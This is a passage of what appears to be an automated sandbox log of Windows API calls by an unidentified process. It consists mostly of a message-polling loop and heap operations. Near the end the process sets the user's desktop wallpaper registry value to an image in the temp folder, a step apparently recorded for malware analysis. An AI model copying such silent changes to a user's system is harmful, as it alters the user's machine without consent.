lpMsg=0x8bf7a0) returned 0 [0302.204] Sleep (dwMilliseconds=0xa) [0302.220] timeGetTime () returned 0x4b807 [0302.221] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.221] Sleep (dwMilliseconds=0xa) [0302.235] timeGetTime () returned 0x4b817 [0302.235] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.235] Sleep (dwMilliseconds=0xa) [0302.250] timeGetTime () returned 0x4b826 [0302.250] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.250] Sleep (dwMilliseconds=0xa) [0302.266] timeGetTime () returned 0x4b836 [0302.266] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.266] Sleep (dwMilliseconds=0xa) [0302.282] timeGetTime () returned 0x4b845 [0302.282] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.282] Sleep (dwMilliseconds=0xa) [0302.297] timeGetTime () returned 0x4b855 [0302.297] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.297] Sleep (dwMilliseconds=0xa) [0302.313] timeGetTime () returned 0x4b865 [0302.313] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.313] Sleep (dwMilliseconds=0xa) [0302.328] timeGetTime () returned 0x4b874 [0302.328] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.328] Sleep (dwMilliseconds=0xa) [0302.344] timeGetTime () returned 0x4b884 [0302.344] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.344] Sleep (dwMilliseconds=0xa) [0302.359] timeGetTime () returned 0x4b893 [0302.360] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.360] Sleep (dwMilliseconds=0xa) [0302.375] timeGetTime () returned 0x4b8a3 [0302.375] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.375] Sleep (dwMilliseconds=0xa) [0302.400] timeGetTime () returned 0x4b8b3 [0302.400] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.400] Sleep (dwMilliseconds=0xa) [0302.406] timeGetTime () returned 0x4b8c2 [0302.406] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.406] Sleep (dwMilliseconds=0xa) [0302.422] timeGetTime () returned 0x4b8d2 [0302.422] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.422] Sleep (dwMilliseconds=0xa) [0302.438] timeGetTime () returned 0x4b8e1 [0302.438] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.438] Sleep (dwMilliseconds=0xa) [0302.453] timeGetTime () returned 0x4b8f1 [0302.453] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.453] Sleep (dwMilliseconds=0xa) [0302.469] timeGetTime () returned 0x4b901 [0302.469] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.469] Sleep (dwMilliseconds=0xa) [0302.491] timeGetTime () returned 0x4b910 [0302.491] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.491] Sleep (dwMilliseconds=0xa) [0302.500] timeGetTime () returned 0x4b920 [0302.500] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.500] Sleep (dwMilliseconds=0xa) [0302.516] timeGetTime () returned 0x4b92f [0302.516] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.516] Sleep (dwMilliseconds=0xa) [0302.531] timeGetTime () returned 0x4b93f [0302.531] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.531] Sleep (dwMilliseconds=0xa) [0302.547] timeGetTime () returned 0x4b94f [0302.547] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.547] Sleep (dwMilliseconds=0xa) [0302.563] timeGetTime () returned 0x4b95e [0302.563] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.563] Sleep (dwMilliseconds=0xa) [0302.578] timeGetTime () returned 0x4b96e [0302.578] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.578] Sleep (dwMilliseconds=0xa) [0302.593] timeGetTime () returned 0x4b97d [0302.594] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.594] Sleep (dwMilliseconds=0xa) [0302.609] timeGetTime () returned 0x4b98d [0302.609] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.609] Sleep (dwMilliseconds=0xa) [0302.625] timeGetTime () returned 0x4b99d [0302.625] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.625] Sleep (dwMilliseconds=0xa) [0302.640] timeGetTime () returned 0x4b9ac [0302.640] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.640] Sleep (dwMilliseconds=0xa) [0302.656] timeGetTime () returned 0x4b9bc [0302.656] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.656] Sleep (dwMilliseconds=0xa) [0302.672] timeGetTime () returned 0x4b9cb [0302.672] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.672] Sleep (dwMilliseconds=0xa) [0302.687] timeGetTime () returned 0x4b9db [0302.687] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.687] Sleep (dwMilliseconds=0xa) [0302.703] timeGetTime () returned 0x4b9eb [0302.703] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.703] Sleep (dwMilliseconds=0xa) [0302.718] timeGetTime () returned 0x4b9fa [0302.718] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.719] Sleep (dwMilliseconds=0xa) [0302.734] timeGetTime () returned 0x4ba0a [0302.734] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.734] Sleep (dwMilliseconds=0xa) [0302.752] timeGetTime () returned 0x4ba19 [0302.752] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.752] Sleep (dwMilliseconds=0xa) [0302.765] timeGetTime () returned 0x4ba29 [0302.765] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.765] Sleep (dwMilliseconds=0xa) [0302.781] timeGetTime () returned 0x4ba39 [0302.781] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.781] Sleep (dwMilliseconds=0xa) [0302.796] timeGetTime () returned 0x4ba48 [0302.796] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0302.796] Sleep (dwMilliseconds=0xa) [0302.812] timeGetTime () returned 0x4ba58 [0302.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0302.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0302.812] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0302.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0302.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0302.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0302.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0302.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0302.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0302.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0302.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0302.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0302.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0302.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0302.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0302.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0302.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0302.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0302.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0302.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0302.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0302.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0302.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0302.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0302.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0302.814] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0302.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0302.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0302.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0302.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0302.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0302.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0302.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0302.814] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0302.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0302.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0302.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0302.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0302.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0302.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0302.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0302.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0302.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0302.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0302.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0302.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0302.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0302.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0302.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0302.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0302.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0302.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0302.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0302.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0302.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0302.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0302.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0302.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0302.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0302.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0302.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0302.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0302.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0302.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0302.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0302.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0302.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0302.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0302.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0302.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0302.817] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0302.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0302.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0302.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0302.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0302.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0302.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0302.818] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0302.818] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0302.818] RegCloseKey (hKey=0x294) returned 0x0 [0302.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0302.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0302.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0302.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0302.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0302.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0302.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0302.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0302.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0302.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0302.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0302.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0302.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0302.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0302.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0302.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0302.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0302.819] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0302.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0302.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0302.820] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0302.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0302.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0302.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0302.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1768 [0302.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0302.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0302.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0302.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0302.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0302.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0302.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0302.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0302.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0302.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0302.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0302.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0302.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0302.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0302.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0302.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0302.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0302.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0302.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0302.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0302.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0302.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0302.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0302.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0302.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0302.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0302.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0302.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0302.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0302.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0302.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0302.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0302.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0302.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0302.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0302.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0302.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0302.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0302.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0302.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0302.823] 